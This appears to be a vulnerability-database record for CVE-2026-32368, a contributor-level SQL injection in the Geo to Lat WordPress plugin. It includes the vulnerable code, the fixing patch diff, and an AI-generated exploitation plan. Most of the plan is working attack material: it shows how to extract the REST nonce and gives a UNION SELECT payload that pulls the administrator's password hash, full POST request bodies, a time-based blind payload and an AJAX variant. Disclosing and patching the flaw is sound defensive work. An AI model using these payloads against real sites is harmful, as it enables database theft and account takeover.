[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fZIBLK6m-zDW5eU58UVizx-4KhmasnESoLkohEELhhyY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":24,"research_verified":25,"research_rounds_completed":26,"research_plan":27,"research_summary":28,"research_vulnerable_code":29,"research_fix_diff":30,"research_exploit_outline":31,"research_model_used":32,"research_started_at":33,"research_completed_at":34,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":25,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":25,"source_links":35},"CVE-2026-32368","geo-to-lat-authenticated-contributor-sql-injection","Geo to Lat \u003C= 1.0.19 - Authenticated (Contributor+) SQL Injection","The Geo to Lat plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.0.19 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","geo-to-lat",null,"\u003C=1.0.19","1.1","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-02-16 00:00:00","2026-04-15 20:51:57",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fac4ebdd1-f28a-4b88-bd92-5d0e9cce6790?source=api-prod",59,[22,23],"geo-to-lat.php","readme.txt","researched",false,3,"# Exploitation Research Plan - CVE-2026-32368\n\n## 1. Vulnerability Summary\nThe **Geo to Lat** plugin (\u003C= 1.0.19) is vulnerable to an **Authenticated SQL Injection** within the `ctl_sanitize_title` function. This function is hooked to the WordPress core `sanitize_title` and `sanitize_file_name` filters. When a new term (like a tag or category) is created via `wp_insert_term`, the plugin performs a database lookup to check for existing slugs. The user-provided term name is interpolated directly into a SQL query string without escaping or parameterization using `$wpdb->prepare()`.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** WordPress REST API (`\u002Fwp-json\u002Fwp\u002Fv2\u002Ftags`) or AJAX (`admin-ajax.php` with `action=add-tag`).\n- **Hook:** `add_filter('sanitize_title', 'ctl_sanitize_title', 9);`\n- **Vulnerable Parameter:** The `name` field of a new term.\n- **Authentication:** Contributor level or higher (users with `edit_posts` capability can typically create tags).\n- **Preconditions:** The plugin must be active. The injection only triggers when `wp_insert_term` is present in the execution backtrace.\n\n## 3. Code Flow\n1.  **Entry Point:** An authenticated user (Contributor+) sends a request to create a new taxonomy term (e.g., a Post Tag).\n2.  **Core Processing:** WordPress calls `wp_insert_term()`.\n3.  **Trigger:** Inside `wp_insert_term`, WordPress calls `sanitize_title($name)` to generate a slug if one isn't provided.\n4.  **Plugin Execution:** The plugin's filter `ctl_sanitize_title($title)` is invoked (Line 14 in `geo-to-lat.php`).\n5.  **Backtrace Check:** The function iterates through `debug_backtrace()` (Lines 29-35). Since `wp_insert_term` is the caller, `$is_term` is set to `true`.\n6.  **Vulnerable Sink:** The code executes `$wpdb->get_var(\"SELECT slug FROM {$wpdb->terms} WHERE name = '$title'\")` (Line 37). The `$title` variable (the term name) is directly concatenated into the query.\n7.  **Data Leak:** If the injection is a `UNION SELECT`, the result of the subquery is assigned to `$term`. The function then returns `$term` as the sanitized title (Line 49).\n8.  **Output:** The leaked data is saved as the \"slug\" for the newly created term and returned in the API response.\n\n## 4. Nonce Acquisition Strategy\nThis exploit targets the **REST API**, which requires a standard WordPress REST nonce for authenticated requests.\n\n1.  **Requirement:** A Contributor-level user session.\n2.  **Action:** Navigate to the WordPress Dashboard.\n3.  **Extraction:**\n    - Use `browser_navigate` to `[TARGET_URL]\u002Fwp-admin\u002F`.\n    - Use `browser_eval` to extract the REST nonce from the `wpApiSettings` object:\n      `browser_eval(\"window.wpApiSettings.nonce\")`\n4.  **Alternative:** The nonce is also typically found in the `_wpnonce` parameter of the tag creation form in the UI.\n\n## 5. Exploitation Strategy\nWe will use a **UNION-based SQL Injection** to extract the administrator's password hash from the `wp_users` table.\n\n### Step-by-Step Plan:\n1.  **Authenticate:** Log in as a Contributor.\n2.  **Obtain Nonce:** Extract the REST API nonce using `browser_eval`.\n3.  **Craft Payload:** \n    - Base name: `InjectedTag`\n    - Payload: `InjectedTag' UNION SELECT (SELECT user_pass FROM wp_users WHERE ID=1)-- -`\n4.  **Execute Request:** Send a `POST` request to `\u002Fwp-json\u002Fwp\u002Fv2\u002Ftags`.\n    - **URL:** `http:\u002F\u002F[TARGET]\u002Fwp-json\u002Fwp\u002Fv2\u002Ftags`\n    - **Method:** `POST`\n    - **Headers:** \n        - `Content-Type: application\u002Fjson`\n        - `X-WP-Nonce: [EXTRACTED_NONCE]`\n    - **Body:**\n      ```json\n      {\n        \"name\": \"Exploit' UNION SELECT (SELECT user_pass FROM wp_users WHERE ID=1)-- -\",\n        \"taxonomy\": \"post_tag\"\n      }\n      ```\n5.  **Observe Response:** The response JSON will contain a `slug` field. Due to the logic in `ctl_sanitize_title` (Line 49), the slug will contain the result of the `UNION SELECT`.\n\n## 6. Test Data Setup\n1.  **Plugin:** Ensure `geo-to-lat` is installed and active.\n2.  **User:** Create a user with the `contributor` role.\n3.  **Environment:** Ensure `WP_DEBUG` is off (though not required, it keeps responses clean).\n\n## 7. Expected Results\n- **HTTP Status:** 201 Created.\n- **Response Body:**\n  ```json\n  {\n    \"id\": [NEW_ID],\n    \"count\": 0,\n    \"description\": \"\",\n    \"link\": \"...\",\n    \"name\": \"Exploit' UNION SELECT (SELECT user_pass FROM wp_users WHERE ID=1)-- -\",\n    \"slug\": \"$P$Byouradminpasswordhash...\",\n    \"taxonomy\": \"post_tag\",\n    ...\n  }\n  ```\n- The `slug` field will leak the password hash (typically starting with `$P$` or `$wp$`).\n\n## 8. Verification Steps\n1.  **Check Database:** Use WP-CLI to verify the created term:\n    `wp term list post_tag --fields=name,slug`\n2.  **Compare:** Verify that the `slug` for the injected tag matches the admin password hash:\n    `wp db query \"SELECT user_pass FROM wp_users WHERE ID=1\"`\n\n## 9. Alternative Approaches\n- **Time-based Blind SQLi:** If the response does not return the slug (unlikely for REST API), use `SLEEP()`:\n  - Payload: `' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n- **AJAX Endpoint:** Use `admin-ajax.php` if REST API is disabled.\n  - Action: `add-tag`\n  - Body: `action=add-tag&screen=edit-post_tag&taxonomy=post_tag&tag-name=[PAYLOAD]&_wpnonce_add-tag=[NONCE]`\n- **Post Metadata:** Since the function is also hooked to `sanitize_file_name`, uploading a file with a malicious name as an authenticated user could also trigger the injection.","The Geo to Lat plugin for WordPress is vulnerable to SQL Injection via the ctl_sanitize_title function, which is hooked to the sanitize_title filter. When a new taxonomy term is created, the plugin executes a database query using the unsanitized term name, allowing authenticated attackers with contributor-level permissions to extract sensitive information using UNION-based techniques.","\u002F\u002F geo-to-lat.php L37\nfunction ctl_sanitize_title($title) {\n\tglobal $wpdb;\n\n\t\u002F\u002F ... (omitted Georgian translation table)\n\n\t$is_term = false;\n\t$backtrace = debug_backtrace();\n\tforeach ( $backtrace as $backtrace_entry ) {\n\t\tif ( $backtrace_entry['function'] == 'wp_insert_term' ) {\n\t\t\t$is_term = true;\n\t\t\tbreak;\n\t\t}\n\t}\n\n\t$term = $is_term ? $wpdb->get_var(\"SELECT slug FROM {$wpdb->terms} WHERE name = '$title'\") : '';","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgeo-to-lat\u002F1.0.19\u002Fgeo-to-lat.php\t2025-11-28 09:06:32.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgeo-to-lat\u002F1.1\u002Fgeo-to-lat.php\t2026-02-22 04:05:50.000000000 +0000\n@@ -29,7 +29,7 @@\n \t\t}\n \t}\n \n-\t$term = $is_term ? $wpdb->get_var(\"SELECT slug FROM {$wpdb->terms} WHERE name = '$title'\") : '';\n+\t$term = $is_term ? $wpdb->get_var($wpdb->prepare(\"SELECT slug FROM {$wpdb->terms} WHERE name = %s\", $title)) : '';\n \tif ( empty($term) ) {\n \t\t$title = strtr($title, apply_filters('ctl_table', $geo2lat));\n \t\tif (function_exists('iconv')){","To exploit this vulnerability, an attacker with Contributor-level access or higher must first obtain a valid WordPress REST API nonce from the dashboard. The attacker then sends a POST request to the \u002Fwp-json\u002Fwp\u002Fv2\u002Ftags (or any taxonomy) endpoint. The 'name' parameter in the JSON payload is crafted to include a SQL UNION SELECT statement designed to extract data, such as \"Exploit' UNION SELECT (SELECT user_pass FROM wp_users WHERE ID=1)-- -\". Because the plugin uses the 'sanitize_title' hook to check for existing slugs by name using direct string interpolation, the SQL query is modified. The plugin then returns the result of the query as the 'slug' for the newly created term, which is visible in the JSON response body to the attacker.","gemini-3-flash-preview","2026-04-20 21:51:27","2026-04-20 21:51:48",{"type":36,"vulnerable_version":37,"fixed_version":11,"vulnerable_browse":38,"vulnerable_zip":39,"fixed_browse":40,"fixed_zip":41,"all_tags":42},"plugin","1.0.19","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgeo-to-lat\u002Ftags\u002F1.0.19","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgeo-to-lat.1.0.19.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgeo-to-lat\u002Ftags\u002F1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgeo-to-lat.1.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgeo-to-lat\u002Ftags"]